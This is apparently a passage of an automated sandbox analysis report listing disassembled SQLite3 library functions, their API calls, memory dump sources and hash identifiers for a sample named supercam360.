                                                    • sqlite3_mprintf.SQLITE3 ref: 60962CCA
                                                    • sqlite3_free.SQLITE3 ref: 60962CD4
                                                    • sqlite3_declare_vtab.SQLITE3 ref: 60962CEC
                                                    • sqlite3_errmsg.SQLITE3 ref: 609629E0
                                                      • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                    • sqlite3_free.SQLITE3 ref: 609629FD
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962A5C
                                                    • sqlite3_exec.SQLITE3 ref: 60962A8D
                                                    • sqlite3_free.SQLITE3 ref: 60962A97
                                                    • sqlite3_prepare_v2.SQLITE3 ref: 60962B1A
                                                    • sqlite3_bind_text.SQLITE3 ref: 60962B48
                                                    • sqlite3_step.SQLITE3 ref: 60962B53
                                                    • sqlite3_column_int64.SQLITE3 ref: 60962B6F
                                                    • sqlite3_finalize.SQLITE3 ref: 60962B7E
                                                    • sqlite3_errmsg.SQLITE3 ref: 60962CFD
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962D0D
                                                    • sqlite3_free.SQLITE3 ref: 60962D23
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mprintf$sqlite3_free$sqlite3_errmsgsqlite3_prepare_v2$sqlite3_finalizesqlite3_step$sqlite3_bind_textsqlite3_column_intsqlite3_column_int64sqlite3_declare_vtabsqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mutex_entersqlite3_vmprintfsqlite3_vtab_config
                                                    • String ID:
                                                    • API String ID: 1118341049-0
                                                    • Opcode ID: 8a30035407fa36d043fa5a42f7ff9a9c36b2d6c52798fad5a4a3b9d2116b71e5
                                                    • Instruction ID: 9690ff12759a1a2b4249a07fad325e6c212a88ae3811af8a178a796da7f2e199
                                                    • Opcode Fuzzy Hash: 8a30035407fa36d043fa5a42f7ff9a9c36b2d6c52798fad5a4a3b9d2116b71e5
                                                    • Instruction Fuzzy Hash: 2EF102B59187048BDB10DF68C48469EBBF2FFA9314F15896AE8989B344D735DC41CB82
                                                    APIs
                                                    • sqlite3_finalize.SQLITE3 ref: 60966178
                                                    • sqlite3_free.SQLITE3 ref: 60966183
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                    • sqlite3_value_text.SQLITE3 ref: 60966236
                                                    • sqlite3_value_int.SQLITE3 ref: 60966274
                                                    • memcmp.MSVCRT ref: 6096639E
                                                      • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                      • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                    • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                    • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                    • String ID: ASC$DESC$x
                                                    • API String ID: 4082667235-1162196452
                                                    • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                    • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                    • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                    • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096882B
                                                    • sqlite3_bind_int.SQLITE3 ref: 60968842
                                                    • sqlite3_step.SQLITE3 ref: 6096884D
                                                    • sqlite3_reset.SQLITE3 ref: 60968858
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968907
                                                    • sqlite3_bind_int.SQLITE3 ref: 60968924
                                                    • sqlite3_step.SQLITE3 ref: 6096892F
                                                    • sqlite3_column_blob.SQLITE3 ref: 60968947
                                                    • sqlite3_column_bytes.SQLITE3 ref: 6096895C
                                                    • sqlite3_column_int64.SQLITE3 ref: 60968975
                                                    • sqlite3_reset.SQLITE3 ref: 609689B0
                                                      • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                      • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                      • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                      • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                      • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                    • sqlite3_free.SQLITE3 ref: 60968A68
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B00
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B2D
                                                    • sqlite3_step.SQLITE3 ref: 60968B38
                                                    • sqlite3_reset.SQLITE3 ref: 60968B43
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B9F
                                                    • sqlite3_bind_blob.SQLITE3 ref: 60968BC8
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968BEF
                                                    • sqlite3_bind_int.SQLITE3 ref: 60968C0C
                                                    • sqlite3_step.SQLITE3 ref: 60968C17
                                                    • sqlite3_reset.SQLITE3 ref: 60968C22
                                                    • sqlite3_free.SQLITE3 ref: 60968C2F
                                                    • sqlite3_free.SQLITE3 ref: 60968C3A
                                                      • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
                                                      • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
                                                      • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
                                                      • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
                                                      • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
                                                      • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 2526640242-0
                                                    • Opcode ID: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                    • Instruction ID: ecb2fadc30329ad4410b738d56806f6ecd0ac298638076f7c65242d8805d2ed1
                                                    • Opcode Fuzzy Hash: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                    • Instruction Fuzzy Hash: A0D1C2B4A153189FDB14DF68C884B8EBBF2BFA9304F118599E888A7344E774D985CF41
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                    • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                    • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                      • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                      • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                      • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                      • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                    • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                    • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                    • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                    • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                    • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                    • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                    • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                    • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                      • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                    • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                    • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                    • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                    • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                    • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                    • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                    • String ID:
                                                    • API String ID: 961572588-0
                                                    • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                    • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                    • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                    • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_nullsqlite3_resetsqlite3_stepsqlite3_value_int$sqlite3_bind_int64
                                                    • String ID: d
                                                    • API String ID: 788585506-2564639436
                                                    • Opcode ID: 89c7d46d4ef9425ac26a812cf09e778331447fb636662684660f9e57a9278091
                                                    • Instruction ID: 7ef39a6ddac577f8b519d45125a156414ab1a70b2d0639156342c4ed50531758
                                                    • Opcode Fuzzy Hash: 89c7d46d4ef9425ac26a812cf09e778331447fb636662684660f9e57a9278091
                                                    • Instruction Fuzzy Hash: 25919CB1E04218DFCB41EFA8C88568DBBF2FB64344F058969E895AB349D734D855CF81
                                                    APIs
                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6095F8E5
                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                    • sqlite3_bind_int.SQLITE3 ref: 6095F8FF
                                                      • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6095F920
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6095F941
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6095F962
                                                    • sqlite3_bind_blob.SQLITE3 ref: 6095F98B
                                                    • sqlite3_step.SQLITE3 ref: 6095F996
                                                    • sqlite3_reset.SQLITE3 ref: 6095F9A1
                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64$sqlite3_mutex_leave$sqlite3_bind_blobsqlite3_bind_intsqlite3_freesqlite3_mprintfsqlite3_mutex_entersqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                    • String ID:
                                                    • API String ID: 1154799056-0
                                                    • Opcode ID: e44b370a1dfa701ff5b9885cc4cf0a2423246689aee604e01ba9336684cc4512
                                                    • Instruction ID: 4c6ccefb8af807723b251ff764995e511564b2c054836566e23fd100615de26c
                                                    • Opcode Fuzzy Hash: e44b370a1dfa701ff5b9885cc4cf0a2423246689aee604e01ba9336684cc4512
                                                    • Instruction Fuzzy Hash: A3415DB4908708AFCB04DF69D18469EBBF1EF98314F11C91AE898A7344E775D9448F92
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                    • String ID: 2$foreign key$indexed
                                                    • API String ID: 4126863092-702264400
                                                    • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                    • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                    • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                    • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                    • sqlite3_step.SQLITE3 ref: 6094A73C
                                                    • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                    • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                    • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                    • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                    • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                    • String ID:
                                                    • API String ID: 2794791986-0
                                                    • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                    • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                    • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                    • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmp
                                                    • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                    • API String ID: 912767213-1308749736
                                                    • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                    • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                    • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                    • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                    • sqlite3_step.SQLITE3 ref: 6094B496
                                                    • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                    • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                    • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                      • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                    • String ID:
                                                    • API String ID: 4082478743-0
                                                    • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                    • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                    • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                    • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                    • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: BINARY$INTEGER
                                                    • API String ID: 317512412-1676293250
                                                    • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                    • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                    • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                    • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                    • sqlite3_step.SQLITE3 ref: 6094B590
                                                    • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                    • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                    • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                    • String ID:
                                                    • API String ID: 2802900177-0
                                                    • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                    • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                    • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                    • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
